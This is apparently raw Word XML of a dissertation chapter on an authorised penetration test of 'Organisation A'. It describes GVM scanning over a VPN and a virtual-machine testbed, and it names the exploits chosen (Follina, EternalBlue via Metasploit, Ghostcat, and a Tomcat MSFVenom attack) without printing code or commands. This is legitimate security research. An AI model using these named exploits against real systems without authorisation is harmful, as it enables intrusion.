        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="2C526E1D" w14:textId="4C712D18" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>There are three sections to chapter 4</w:t>
      </w:r>
      <w:r w:rsidR="00307E5F">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the first is the problem formulation</w:t>
      </w:r>
      <w:r w:rsidR="00307E5F">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> what the problem is and why it needs to be examined. The second is the project design</w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t xml:space="preserve">, covering the </w:t>
      </w:r>
      <w:r>
        <w:t>hardware and software used for the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>. The third details how the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71570F6C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc113190738"/>
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Problem Formulation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="33F7879D" w14:textId="2D28B23A" w:rsidR="00DF42B8" w:rsidRDefault="006E7DC7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>rganisation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> has been attacked and breached prior to this point.</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>Device hardening and s</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve">ecurity measures </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t xml:space="preserve">implemented </w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve">to mitigate any recurrence. </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>To test this, an outside perspective</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t>s required</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> to ascertain whether the security measures </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> adequate.</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t>he problem is</w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>, therefore,</w:t>
      </w:r>
      <w:r w:rsidR="002B7C3A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00564DCF">
        <w:t>determine whether Organisation A’s security stance is sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A62BC" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc113190739"/>
      <w:r>
        <w:t>4.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="214A91D4" w14:textId="03188015" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Oracle VM Virtual Box </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> installed on a base computer and a virtual machine using Kali Linux set up</w:t>
      </w:r>
      <w:r w:rsidR="00360363">
        <w:t xml:space="preserve"> as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00360363">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Access to </w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>rganisation</w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gained via FortiClient VPN for </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> initial scan using GVM, generat</w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reports </w:t>
      </w:r>
      <w:r w:rsidR="00307E5F">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r>
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="00307E5F">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVEs within the system. At this point a copy of the reports </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> given to </w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t>Organisation</w:t>
      </w:r>
      <w:r w:rsidR="00307E5F">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59A937" w14:textId="42D5A960" w:rsidR="005C4651" w:rsidRDefault="00360363" w:rsidP="00360363">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00360363">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37989CD0" wp14:editId="49404CF8">
            <wp:extent cx="5731510" cy="2044065"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="13335"/>
            <wp:docPr id="22" name="Picture 2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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2044065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF9534" w14:textId="7561D56C" w:rsidR="00360363" w:rsidRDefault="00360363" w:rsidP="00360363">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc111363605"/>
      <w:bookmarkStart w:id="210" w:name="_Toc111363742"/>
      <w:bookmarkStart w:id="211" w:name="_Toc111981766"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Virtual Machine using Forticlient VPN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
      <w:bookmarkEnd w:id="210"/>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="639B3CF9" w14:textId="77777777" w:rsidR="00360363" w:rsidRPr="00360363" w:rsidRDefault="00360363" w:rsidP="00307E5F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBE43C2" w14:textId="4C528EAD" w:rsidR="00360363" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reports </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> examined</w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve"> by the author,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the CVEs generated </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> researched to see whether any of the vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>could be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploited</w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve">, however, unethical to ask Organisation A not </w:t>
      </w:r>
      <w:r w:rsidR="000348A5">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve">mitigate the vulnerabilities whilst waiting for the </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>exploits to be conducted</w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve">, so the vulnerabilities found </w:t>
      </w:r>
      <w:r w:rsidR="009D5FA5">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="006E7DC7">
        <w:t xml:space="preserve"> tested on virtual machines.</w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t xml:space="preserve"> Therefore, a</w:t>
      </w:r>
      <w:r w:rsidR="00360363">
        <w:t xml:space="preserve"> testbed was set up as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00360363">
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AF20B9" w14:textId="79AABCF6" w:rsidR="00360363" w:rsidRDefault="00423F61" w:rsidP="00307E5F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00423F61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26202F31" wp14:editId="1E4F5FE0">
            <wp:extent cx="3204210" cy="2861309"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="15875"/>
            <wp:docPr id="760259201" name="Picture 76025920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01" name="Picture 760259201" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId58"/>
                    <a:srcRect l="7685" t="7739" r="14445"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3204488" cy="2861558"/>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66717B3" w14:textId="1F2C0ED6" w:rsidR="00307E5F" w:rsidRDefault="00307E5F" w:rsidP="00307E5F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc111363606"/>
      <w:bookmarkStart w:id="213" w:name="_Toc111363743"/>
      <w:bookmarkStart w:id="214" w:name="_Toc111981767"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Virtual Machine Testbed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="213C0660" w14:textId="77777777" w:rsidR="00360363" w:rsidRDefault="00360363" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B241DB8" w14:textId="5F3AB5AF" w:rsidR="008C1007" w:rsidRDefault="008C1007" w:rsidP="00360363">
      <w:r>
        <w:t xml:space="preserve">An exploit </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> required to gain remote access to the network, so Follina (CVE 2022-30190) was chosen to breach network security.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1199EF2B" w14:textId="781D92FF" w:rsidR="008C1007" w:rsidRDefault="008C1007" w:rsidP="00360363">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The results from the scan showed an OS end of life with a severity level 10. To recreate this scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00991450">
        <w:t>, Eternal Blue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00991450">
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00991450">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="00991450">
        <w:t xml:space="preserve"> executed on a Windows 7 virtual machine using Kali Linux and Metasploit with no payload.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B4662" w14:textId="44934DD9" w:rsidR="0096469B" w:rsidRPr="0096469B" w:rsidRDefault="0096469B" w:rsidP="008C1007">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="008C1007">
        <w:t xml:space="preserve">Ghostcat exploit </w:t>
      </w:r>
      <w:r w:rsidR="00D30365">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="008C1007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063303A">
        <w:t>used to test</w:t>
      </w:r>
      <w:r w:rsidR="008C1007">
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerability CVE 2020-1938</w:t>
      </w:r>
      <w:r w:rsidR="008C1007">
        <w:t xml:space="preserve"> (severity level 9.8)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the Apache Tomcat webapp</w:t>
      </w:r>
      <w:r w:rsidR="008C1007">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB0255" w14:textId="1E8C0DA3" w:rsidR="0096469B" w:rsidRDefault="0096469B" w:rsidP="008C1007">
      <w:r>
        <w:t xml:space="preserve">Apache Tomcat whilst being vulnerable to Ghostcat is also vulnerable to the ‘Jerry’ exploit with MSFVenom so this </w:t>
      </w:r>
      <w:r w:rsidR="0063303A">
        <w:t>was also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DAD30F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc113190740"/>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="1ADFB6A0" w14:textId="3416F39F" w:rsidR="00DF42B8" w:rsidRPr="000E63BA" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>This section will set out the methods used to set up the experiment</w:t>
      </w:r>
      <w:r w:rsidR="000E7253">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DD93E" w14:textId="4E0D5755" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="000E7253">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc113190741"/>
      <w:r>
        <w:t>4.4.1</w:t>
      </w:r>
      <w:r w:rsidR="000E7253">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E02D76">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base Machine</w:t>
      </w:r>
      <w:r w:rsidR="000E7253">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the GVM Experiment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="7833CD14" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00F573E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>The computer chosen for the base machine was a Viglen Genie with an Intel ® Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00696B10">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i7-7700 CPU @ 3.60GHz with 32GB RAM and a 64-bit operating system and x64-based processor. An OS of Windows 10 Enterprise version 21H1 with Windows Feature Experience Pack 120.2212.4170.0 was used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764F62E3" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc113190742"/>
      <w:r>
        <w:t>4.4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>FortiClient VPN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E918A96" w14:textId="7CA57BA4" w:rsidR="00DF42B8" w:rsidRPr="00AD0C7F" w:rsidRDefault="21523073" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FortiClient VPN was installed on the base machine and opened using credentials </w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>rganisation</w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, purposely concealed to ensure confidentiality, as detailed in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E7A88" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A176A3" wp14:editId="7B968DD6">
            <wp:extent cx="3025017" cy="2992670"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="17780"/>
            <wp:docPr id="27" name="Picture 27"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imeline&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId59"/>
                    <a:srcRect l="1213" r="1484" b="995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3040598" cy="3008085"/>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5F2F654F" w14:textId="2613B140" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc111363607"/>
      <w:bookmarkStart w:id="219" w:name="_Toc111363744"/>
      <w:bookmarkStart w:id="220" w:name="_Toc111981768"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: FortiClient VPN connection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="0EDF6698" w14:textId="77777777" w:rsidR="00BF31AF" w:rsidRPr="00BF31AF" w:rsidRDefault="00BF31AF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D87E9E" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc113190743"/>
      <w:r>
        <w:t>4.4.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Oracle VM VirtualBox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="597E39C1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle VM VirtualBox (VirtualBox) was installed on the base machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04AF33" w14:textId="56E8D243" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A virtual machine was created in VirtualBox using Kali Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="26C09EF0">
        <w:t>2022.2-v</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="26C09EF0">
        <w:t>rtualbox-amd-64</w:t>
      </w:r>
      <w:r w:rsidRPr="3BFB780D">
        <w:t xml:space="preserve">, with an </w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="3BFB780D">
        <w:t xml:space="preserve"> Debian (64</w:t>
      </w:r>
      <w:r w:rsidRPr="7F23A3E2">
        <w:t>-bit</w:t>
      </w:r>
      <w:r w:rsidRPr="145E7D00">
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The b</w:t>
      </w:r>
      <w:r w:rsidRPr="145E7D00">
        <w:t xml:space="preserve">ase memory </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidRPr="145E7D00">
        <w:t>11500MB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidRPr="145E7D00">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="2C4211CE">
        <w:t xml:space="preserve"> processors</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="2C4211CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the acceleration was VT-x/AMD-V, Nested Paging, PAE/NX and KVM Paravirtualization as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>44</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC1F112" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="239F5DE3" wp14:editId="33E1879D">
            <wp:extent cx="5731510" cy="5201920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="229" name="Picture 22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Picture 229" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5201920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A2C8F" w14:textId="7A453230" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
